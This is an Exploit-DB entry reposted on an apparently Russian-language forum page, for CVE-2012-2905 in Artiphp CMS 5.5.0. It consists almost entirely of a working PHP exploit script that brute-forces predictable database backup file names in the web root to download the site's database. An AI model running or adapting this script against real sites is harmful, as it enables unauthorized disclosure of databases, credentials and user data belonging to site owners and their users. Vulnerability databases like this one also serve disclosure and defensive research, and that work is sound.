- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 18889
- Проверка EDB
-
- Пройдено
- Автор
- LIQUIDWORM
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2012-2905
- Дата публикации
- 2012-05-16
Код:
<?php
/*
Artiphp CMS 5.5.0 Database Backup Disclosure Exploit
Vendor: Artiphp
Product web page: http://www.artiphp.com
Affected version: 5.5.0 Neo (r422)
Summary: Artiphp is a content management system (CMS) open
and free to create and manage your website.
Desc: Artiphp stores database backups using backupDB() utility
with a predictable file name inside the web root, which can be
exploited to disclose sensitive information by downloading the
file. The backup is located in '/artzone/artpublic/database/'
directory as 'db_backup_[type].[yyyy-mm-dd].sql.gz' filename.
Tested on: Microsoft Windows XP Professional SP3 (EN)
Apache 2.2.21
PHP 5.3.8 / 5.3.9
MySQL 5.5.20
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2012-5091
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5091.php
15.05.2012
*/
error_reporting(0);
print "\no==========================================================o\n";
print "| |";
print "\n|\tArtiphp CMS 5.5.0 DB Backup Disclosure Exploit |\n";
print "| |\n";
print "|\t\t\tby LiquidWorm |\n";
print "| |";
print "\no==========================================================o\n";
if ($argc < 3)
{
print "\n\n\x20[*] Usage: php $argv[0] <host> <port>\n\n\n";
die();
}
$godina_array = array('2012','2011','2010');
$mesec_array = array('12','11','10','09',
'08','07','06','05',
'04','03','02','01');
$dn_array = array('31','30','29','28','27','26',
'25','24','23','22','21','20',
'19','18','17','16','15','14',
'13','12','11','10','09','08',
'07','06','05','04','03','02',
'01');
$backup_array = array('full','structure','partial');
$host = $argv[1];
$port = intval($argv[2]);
$path = "/artiphp/artzone/artpublic/database/"; // change per need.
$alert1 = "\033[0;31m";
$alert2 = "\033[0;37m";
foreach($godina_array as $godina)
{
print "\n\n\x20[*] Checking year: ".$godina."\n\n Scanning: ";
sleep(2);
foreach($mesec_array as $mesec)
{
foreach($dn_array as $dn)
{
print "~";
foreach($backup_array as $backup)
{
if(file_get_contents("http://".$host.":".$port.$path."db_backup_".$backup.".".$godina."-".$mesec."-".$dn.".sql.gz"))
{
print "\n\n\x20[!] DB backup file discovered!\n\n";
echo $alert1;
print "\x20==>\x20";
echo $alert2;
die("http://".$host.":".$port.$path."db_backup_".$backup.".".$godina."-".$mesec."-".$dn.".sql.gz\n");
}
}
}
}
}
print "\n\n\x20[*] Zero findings.\n\n\n"
?>
- Источник
- www.exploit-db.com